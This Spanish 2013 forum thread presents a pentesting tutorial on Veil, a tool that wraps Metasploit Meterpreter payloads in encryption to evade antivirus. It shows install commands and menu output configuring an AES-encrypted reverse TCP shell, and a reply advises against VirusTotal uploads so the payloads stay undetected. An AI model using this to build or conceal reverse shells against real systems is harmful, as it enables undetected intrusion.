Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: ZanGetsu en Junio 12, 2013, 01:19:34 PM

Título: Antivirus Bypass con Veil
Publicado por: ZanGetsu en Junio 12, 2013, 01:19:34 PM
Hace unos pocos días Christopher Truncer publicaba en SU BLOG un artículo sobre una herramienta desarrollada por él mismo y a la que ha dado el nombre de VEIL. Esta herramienta tiene una utilidad interesante para todos aquellos que nos dedicamos al Pentesting y tenemos en ocasiones algún problema con los Antivirus, ya que genera payloads de Metasploit que luego codifica de una manera propia y genera un ejecutable nuevo, a priori no detectado por ellos.

La herramienta puede descargarse de ESTE GITHUB: https://github.com/ChrisTruncer/Veil
así que os recomendo que lo probéis directamente con Kali Linux.

# git clone https://github.com/ChrisTruncer/Veil.git

Incluso si lo hacéis con Kali-Linux, es necesario instalar una serie de componentes en el Wine (Python y otros módulos). Por suerte el autor nos ha dejado un script que lo hace todo de forma automática. Solo tenemos que ir dandole a siguiente a todo lo que salga:

# cd Veil
# cd setup
# ./setup.sh

Una vez hecho esto, ya podemos llamar a Veil y empezar a jugar:

# ./Veil.py
====================================
Veil | [Version]: 1.0 | [Updated]: 05.30.2013
====================================
[By]: Chris Truncer | [Twitter]: @ChrisTruncer
====================================
[?] What payload type would you like to use?
1 - Meterpreter - Python - void pointer
2 - Meterpreter - Python - VirtualAlloc()
3 - Meterpreter - Python - base64 Encoded
4 - Meterpreter - Python - Letter Substitution
5 - Meterpreter - Python - ARC4 Stream Cipher
6 - Meterpreter - Python - DES Encrypted
7 - Meterpreter - Python - AES Encrypted
0 - Exit Veil
[>] Please enter the number of your choice: 7

Nos da varias opciones de técnicas que podemos usar para generar un Meterpreter evadiendo los antivirus. Elegimos, por ejemplo, el cifrado AES, y seguimos adelante:

[?] What type of payload would you like?
1 - Reverse TCP
2 - Reverse HTTP
3 - Reverse HTTPS
0 - Exit Veil
[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.1.100
[?] What's the Local Port Number: 1212
Título: Re:Antivirus Bypass con Veil
Publicado por: Metadato en Junio 26, 2013, 04:29:31 PM
Se ve genial la herramienta!!! Muchas gracias por el aporte.

PD: Al final, como tu dices, la herramienta se quemará en poco tiempo por ser pública, pero por favor, no la quemes tú analizándo en VirusTotal, por que si nos ponemos todos a analizar en VirusTotal pensando en que se va a quemar por ser pública, en realidad la estamos quemando nosotros.

Saludos.